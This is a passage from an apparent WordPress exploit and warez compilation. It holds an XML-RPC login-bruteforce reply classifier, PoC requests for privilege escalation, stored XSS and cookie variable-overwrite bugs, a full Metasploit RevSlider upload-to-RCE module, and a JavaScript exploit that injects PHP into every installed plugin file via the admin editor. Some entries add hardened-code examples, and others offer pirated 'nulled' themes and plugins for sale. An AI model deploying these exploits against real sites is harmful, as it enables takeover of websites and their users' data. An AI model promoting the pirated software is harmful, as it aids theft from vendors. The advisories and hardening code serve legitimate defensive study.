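    $u = htmlspecialchars($user, ENT_XML1 | ENT_QUOTES, 'UTF-8');
    $p = htmlspecialchars($pass, ENT_XML1 | ENT_QUOTES, 'UTF-8');
    return '<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName>'
         . '<params><param><value><string>' . $u . '</string></value></param>'
         . '<param><value><string>' . $p . '</string></value></param></params></methodCall>';
}

function classify_xmlrpc_reply(string $body): string
{
    libxml_use_internal_errors(true);
    $xml = simplexml_load_string($body);
    if ($xml === false || $xml->getName() !== 'methodResponse') {
        return 'not-xmlrpc';               // HTML 404, WAF block page, empty body
    }
    if (!isset($xml->fault)) {
        return 'auth-accepted';            // a <params> payload means a valid login
    }
    $code = null;
    foreach ($xml->fault->value->struct->member as $member) {
        if ((string) $member->name === 'faultCode') {
            $code = (int) $member->value->int;
        }
    }
    switch ($code) {
        case 403: return 'auth-rejected';  // the case the checker logs as "Found"
        case 405: return 'xmlrpc-disabled';
        default:  return 'fault-' . $code;
    }
}

// constructed sample replies, labelled by what a scanner should record
$fault = '<?xml version="1.0"?><methodResponse><fault><value><struct>'
       . '<member><name>faultCode</name><value><int>%d</int></value></member>'
       . '<member><name>faultString</name><value><string>%s</string></value></member>'
       . '</struct></value></fault></methodResponse>';
$samples = [
    'wrong password'  => sprintf($fault, 403, 'Incorrect username or password.'),
    'xmlrpc disabled' => sprintf($fault, 405, 'XML-RPC services are disabled on this site.'),
    'valid login'     => '<?xml version="1.0"?><methodResponse><params><param><value><array>'
                       . '<data><value><struct><member><name>isAdmin</name><value><boolean>1'
                       . '</boolean></value></member></struct></value></data></array></value>'
                       . '</param></params></methodResponse>',
    'not wordpress'   => '<html><body><h1>Not Found</h1></body></html>',
];

echo build_get_users_blogs('admin', 'p<ss&word'), "\n";
foreach ($samples as $label => $body) {
    printf("%-16s => %s\n", $label, classify_xmlrpc_reply($body));
}
```

A scanner keyed only on the 403 string misses two outcomes that matter: a 405 fault means the host is not worth brute-forcing, and a reply without a fault means the dummy credentials actually worked.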
18. WPTouch (Enterprise Version)
A complete mobile solution for WordPress. http://www.wptouch.com/pricing/
ENTERPRISE $349, Supported WordPress Sites: Unlimited
The script comes with 1 year of updates; without updates it is lifetime. 100 euro, PayPal/BTC. Waiting for PM.
19. # Exploit Title: WordPress WP Membership plugin [Privilege escalation]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4038

1 Description

Any registered user can perform a privilege escalation through the `iv_membership_update_user_settings` AJAX action. Although this exploit can be used to modify other plugin-related data (e.g. payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take the administrator role on the infected website.

2 Proof of Concept

* Log in as a regular user
* Send a POST request to `http://example.com/wp-admin/admin-ajax.php` with data:
`action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`

3 Actions taken after discovery

Vendor was informed on 2015/05/19.

4 Solution

No official solution yet exists.

Source: http://dl.packetstormsecurity.net/1505-exploits/wpmembership-escalate.txt
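An added example, not the WP Membership plugin's code: a minimal model of an admin-ajax handler that, like the action above, receives `form_data` as a URL-encoded string. The vulnerable variant applies every key it finds to the user row named in `user_id`, which is exactly what the PoC body abuses; the hardened variant checks a nonce, pins the target to the caller, copies only listed fields and requires a promote-users capability and a known role before touching `user_role`. `$users` and `$caller` stand in for WP's user table and current user (assumed shapes); the WordPress functions named in the comments are the real equivalents.

```php
<?php
// Added example, not the plugin's code: a model of an admin-ajax handler
// fed the PoC body "user_id=<id>&user_role=administrator" via form_data.
// $users stands in for the user table, $caller for the logged-in user.

function vulnerable_update_user_settings(array $post, array &$users): string
{
    parse_str($post['form_data'] ?? '', $form);   // user_id=7&user_role=administrator
    $id = (int) ($form['user_id'] ?? 0);
    if (!isset($users[$id])) {
        return 'no such user';
    }
    foreach ($form as $field => $value) {         // mass assignment, role included:
        $users[$id][$field] = $value;             // any logged-in user can make itself admin
    }
    return 'updated';
}

function hardened_update_user_settings(array $post, array $caller, array &$users): string
{
    // 1. nonce bound to this action  (WP: check_ajax_referer('iv_membership_settings', 'nonce'))
    if (!hash_equals($caller['nonce'], (string) ($post['nonce'] ?? ''))) {
        return 'bad nonce';
    }
    parse_str($post['form_data'] ?? '', $form);
    // 2. the target is always the caller; a user_id in the body is ignored
    $id = $caller['id'];
    // 3. only listed profile fields are copied
    foreach (['phone', 'newsletter'] as $field) {
        if (isset($form[$field])) {
            $users[$id][$field] = (string) $form[$field];
        }
    }
    // 4. role changes need a capability and a role from a fixed list
    //    (WP: current_user_can('promote_users'), wp_roles()->is_role())
    if (isset($form['user_role'])) {
        $assignable = ['subscriber', 'member'];
        if (empty($caller['can_promote_users']) || !in_array($form['user_role'], $assignable, true)) {
            return 'updated, role change denied';
        }
        $users[$id]['user_role'] = $form['user_role'];
    }
    return 'updated';
}

// constructed sample: user 7 is a subscriber replaying the PoC request
$users  = [7 => ['user_role' => 'subscriber', 'phone' => '']];
$post   = ['form_data' => 'user_id=7&user_role=administrator&phone=123', 'nonce' => 'n0nce'];
$caller = ['id' => 7, 'nonce' => 'n0nce', 'can_promote_users' => false];

$table = $users;
echo vulnerable_update_user_settings($post, $table), ': role = ', $table[7]['user_role'], "\n";
$table = $users;
echo hardened_update_user_settings($post, $caller, $table), ': role = ', $table[7]['user_role'], "\n";
```

The nonce alone would not have stopped this PoC, since the attacker is a logged-in user who can fetch a valid nonce; the capability check on the role field is the part that matters.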
20. Advisory ID: HTB23257
Product: WP Photo Album Plus WordPress Plugin
Vendor: J.N. Breetvelt
Vulnerable Version(s): 6.1.2 and probably prior
Tested Version: 6.1.2
Advisory Publication: April 29, 2015 [without technical details]
Vendor Notification: April 29, 2015
Vendor Patch: April 29, 2015
Public Disclosure: May 20, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-3647
Risk Level: Medium
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a stored XSS vulnerability in the WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of a vulnerable WordPress installation. An attacker might be able to hijack the administrator's session and obtain full control over the vulnerable website.

The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and "comemail" HTTP POST parameters to the "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when posting a comment. A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in the administrator's browser in the context of the vulnerable website, when the administrator views images or comments in the administrative interface.

The simple exploit below will store JS code in the WP database and display a JS popup window with the word "ImmuniWeb" every time the administrator views comments or images:

<form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" method="post" name="main">
<input type="hidden" name="action" value='wppa'>
<input type="hidden" name="wppa-action" value='do-comment'>
<input type="hidden" name="photo-id" value='2'>
<input type="hidden" name="comment" value='1'>
<input type="hidden" name="moccur" value='1'>
<input type="hidden" name="comemail" value='"><script>alert(/ImmuniWeb/);</script>'>
<input type="hidden" name="comname" value='"><script>alert(/ImmuniWeb/);</script>'>
<input type="submit" id="btn">
</form>

The code will be automatically executed when the administrator visits one of the following pages:
http://[host]/wp-admin/admin.php?page=wppa_manage_comments
http://[host]/wp-admin/admin.php?page=wppa_moderate_photos

-----------------------------------------------------------------------------------------------

Solution:

Update to WP Photo Album Plus 6.1.3

More Information:
https://wordpress.org/plugins/wp-photo-album-plus/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) in WP Photo Album Plus WordPress Plugin.
[2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP site.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Source: http://dl.packetstormsecurity.net/1505-exploits/wpphotoalbumplus612-xss.txt
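Where the stored value is printed back matters: the PoC above opens with `">` because the comment name ends up inside a quoted attribute on the admin pages, so the payload first closes the attribute and the tag. As an added example that is not the plugin's code, the same stored string is rendered with and without context-aware escaping, and DOMDocument is used to check whether a `<script>` element actually results from the rendered HTML. The `render_*` functions are illustrative stand-ins for the admin page; `htmlspecialchars()` with `ENT_QUOTES` does here what WordPress's `esc_attr()` does in a plugin.

```php
<?php
// Added example, not WP Photo Album Plus code. The stored commenter name is
// the advisory's payload; the two render functions stand in for the admin
// page that prints it back inside a quoted attribute.

$stored_comname = '"><script>alert(/ImmuniWeb/);</script>';

function render_vulnerable(string $comname): string
{
    // raw database value dropped into an attribute: "> ends the attribute and the tag
    return '<td><input type="text" name="comname" value="' . $comname . '"></td>';
}

function render_escaped(string $comname): string
{
    // escape at output time, for the HTML attribute context (WP: esc_attr())
    $safe = htmlspecialchars($comname, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<td><input type="text" name="comname" value="' . $safe . '"></td>';
}

// check: how many <script> elements does an HTML parser see in the fragment?
function script_count(string $fragment): int
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body><table><tr>' . $fragment . '</tr></table></body></html>');
    return $doc->getElementsByTagName('script')->length;
}

foreach (['vulnerable' => render_vulnerable($stored_comname),
          'escaped'    => render_escaped($stored_comname)] as $label => $html) {
    printf("%-10s script elements: %d\n%s\n", $label, script_count($html), $html);
}
```

Storing the value raw is fine; the fix belongs at every output site, with the escaping function chosen for that site's context (attribute, text node, URL, JavaScript string), which is why a single "sanitize on input" filter tends to leave one of the admin pages exposed.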
21. Download nulled Expression WordPress Theme, best suited for photographers and creatives who use portfolios to effectively present their work. The downloadable Expression Photography Responsive WordPress Theme is powered by the advanced Pexeto Panel, which provides tons of options to manage and modify any aspect of the theme. With all the styling options provided you can easily customize the appearance of the theme and build your own custom skin. Download
22. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Simo Ben youssef', # Vulnerability discovery
          'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
          ['EDB', '35385'],
          ['WPVDB', '7954'],
          ['OSVDB', '115118']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]],
      'DisclosureDate' => 'Nov 26 2014',
      'DefaultTarget'  => 0)
    )
  end

  def check
    # the plugin ships its version in a world-readable release_log.txt
    release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt')
    check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96')
  end

  def exploit
    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'

    # Build the zip
    payload_zip = Rex::Zip::Archive.new
    # If the filename in the zip is revslider.php it will be automatically
    # executed but it will break the plugin and sometimes WordPress
    payload_zip.add_file('revslider/' + php_pagename, payload.encoded)

    # Build the POST body: the unauthenticated update_plugin AJAX action
    # extracts whatever zip it is handed under wp-content/plugins/revslider/temp
    data = Rex::MIME::Message.new
    data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"')
    data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"')
    data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri'    => wordpress_url_admin_ajax,
      'method' => 'POST',
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    )

    if res
      if res.code == 200 && res.body =~ /Update in progress/
        # The payload itself almost never deleted, try anyway
        register_files_for_cleanup(php_pagename)
        # This normally works
        register_files_for_cleanup('../revslider.zip')

        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename)
        print_good("#{peer} - Our payload is at: #{final_uri}")
        print_status("#{peer} - Calling payload...")
        send_request_cgi(
          'uri'     => normalize_uri(final_uri),
          'timeout' => 5
        )
      elsif res.code == 200 && res.body =~ /^0$/
        # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown
        fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated")
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'ERROR')
    end
  end
end

Source
23. Advisory ID: HTB23255
Product: eShop WordPress plugin
Vendor: Rich Pedley
Vulnerable Version(s): 6.3.11 and probably prior
Tested Version: 6.3.11
Advisory Publication: April 15, 2015 [without technical details]
Vendor Notification: April 15, 2015
Public Disclosure: May 6, 2015
Vulnerability Type: Code Injection [CWE-94]
CVE Reference: CVE-2015-3421
Risk Level: Medium
CVSSv2 Base Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a security vulnerability in the eShop WordPress Plugin, which can be exploited by a remote attacker to overwrite arbitrary PHP variables within the context of the vulnerable application.

The vulnerability exists due to insufficient validation of user-supplied input in the "eshopcart" HTTP cookie. Successful exploitation of this vulnerability may potentially result in arbitrary PHP code execution (RCE). Often such types of vulnerabilities lead to RCE; however, in this case we can only overwrite string variables within the scope of the 'eshop_checkout()' function in the '/wp-content/plugins/eshop/checkout.php' file. This reduces our current vectors of exploitation to Full Path Disclosure and Cross-Site Scripting.

Below is a simple PoC that overwrites the contents of the "wpdb" PHP variable, which causes an error in the code and discloses the full installation path:

GET /shopping-cart-2/checkout/ HTTP/1.1
Cookie: eshopcart=wpdb%3d1%7C;

Another PoC triggers the XSS vector and executes a JS pop-up box displaying "ImmuniWeb":

GET /shopping-cart-2/checkout/ HTTP/1.1
Cookie: eshopcart=phone%3dsdfg'"><script>alert(/ImmuniWeb/)</script>

-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2015-04-15 Vendor alerted via contact form and thread in support forum, no reply.
2015-04-29 Vendor alerted via contact form and emails, no reply.
2015-05-05 Fix requested via contact form and emails, no reply.
2015-05-06 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23255 - https://www.htbridge.com/advisory/HTB23255 - Arbitrary Variable Overwrite in eShop WordPress Plugin.
[2] eShop WordPress Plugin - http://quirm.net/ - eShop is an accessible shopping cart plugin for WordPress, packed with various features.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Source
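The mechanism behind both PoCs, as an added example rather than eShop's code: a model of a checkout routine that unpacks a `key=value|key=value` cookie into local variables with PHP variable variables (`$$key`). With the first PoC cookie the function's `$wpdb` becomes the string "1", so the next `$wpdb->` call is the fatal error that leaks the path; with the second, `phone` lands unescaped in an input. The hardened version keeps the cart in an array and only accepts listed keys. The field names other than `phone` and `wpdb`, and the shape of the checkout function, are assumptions.

```php
<?php
// Added example, not eShop's code: a model of unpacking the "eshopcart"
// cookie (key=value|key=value, already URL-decoded by PHP into $_COOKIE)
// into local variables with $$key, and a hardened version that keeps it
// in an array with a fixed key list.

function checkout_vulnerable(string $eshopcart, object $wpdb): array
{
    foreach (explode('|', $eshopcart) as $pair) {
        if (strpos($pair, '=') === false) {
            continue;
        }
        [$key, $value] = explode('=', $pair, 2);
        $$key = $value;          // "wpdb=1" rebinds the local $wpdb to the string "1"
    }
    $phone = $phone ?? '';
    return [
        // in the real plugin the next $wpdb->prepare() call fatals here and,
        // with display_errors on, the error message prints the full path
        'wpdb_type' => gettype($wpdb),
        'html'      => '<input type="text" name="phone" value="' . $phone . '">',
    ];
}

function checkout_hardened(string $eshopcart): array
{
    $cart = ['phone' => '', 'qty' => '0'];      // the only keys the cookie may set
    foreach (explode('|', $eshopcart) as $pair) {
        if (strpos($pair, '=') === false) {
            continue;
        }
        [$key, $value] = explode('=', $pair, 2);
        if (array_key_exists($key, $cart)) {
            $cart[$key] = $value;               // unknown keys such as "wpdb" are dropped
        }
    }
    $phone = htmlspecialchars($cart['phone'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return [
        'cart' => $cart,
        'html' => '<input type="text" name="phone" value="' . $phone . '">',
    ];
}

$wpdb = new stdClass();   // stand-in for WordPress's global database object
$xss  = 'phone=sdfg\'"><script>alert(/ImmuniWeb/)</script>';   // second PoC, decoded

print_r(checkout_vulnerable('wpdb=1|', $wpdb));   // first PoC, decoded
print_r(checkout_vulnerable($xss, $wpdb));
print_r(checkout_hardened('wpdb=1|' . $xss));
```

The advisory's CWE-94 rating comes from the variable-variable write itself; whether it reaches code execution depends entirely on which variables the surrounding function later uses, which is why the same bug class is sometimes only a path disclosure and sometimes an include of an attacker-chosen file.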
24. Exploit that uses a WordPress cross site scripting flaw to execute code as the administrator.

/*
Author: @evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress Plugins/Themes/Core To End Up Executing Code After Being Triggered With An Administrator Privileged User. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.
*/

// Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != -1) ? 'plugins.php' : 'wp-admin/plugins.php';

// Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();

// Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout: 30000,
  success: function (txt) {
    xss_div.html(txt);
  }
});

// Put All Plugins Edit URL in Array
plugins_edit = [];
xss_div.find('a').each(function () {
  if (jQuery(this).attr('href').indexOf('?file=') != -1) {
    plugins_edit.push(jQuery(this).attr('href'));
  }
});

// Inject Payload: fetch each plugin editor page, read its nonce and file
// contents, then save the file back with the PHP payload prepended
for (var i = 0; i < plugins_edit.length; i++) {
  jQuery.ajax({
    url: plugins_edit[i],
    type: 'GET',
    async: false,
    cache: false,
    timeout: 30000,
    success: function (txt) {
      xss_div.html(txt);
      _wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"')[1];
      old_code = jQuery('form#template div textarea#newcontent')[0].value;
      payload = '<?php phpinfo(); ?>';
      new_code = payload + '\n' + old_code;
      file = plugins_edit[i].split('file=')[1];
      jQuery.ajax({
        url: plugins_edit[i],
        type: 'POST',
        data: {
          '_wpnonce': _wpnonce,
          'newcontent': new_code,
          'action': 'update',
          'file': file,
          'submit': 'Update File'
        },
        async: false,
        cache: false,
        timeout: 30000,
        success: function (txt) {
          xss_div.html(txt);
          if (jQuery('form#template div textarea#newcontent')[0].value.indexOf(payload) != -1) {
            // Passed, this is up to you ( skiddies Filter )
            injected_file = window.location.href.split('wp-admin')[0] + '/wp-content/plugins/' + file;
            // e.g. http://localhost/wp//wp-content/plugins/504-redirects/redirects.php
            throw new Error('');
          }
        }
      });
    }
  });
}

Source : WordPress 4.2.1 XSS / Code Execution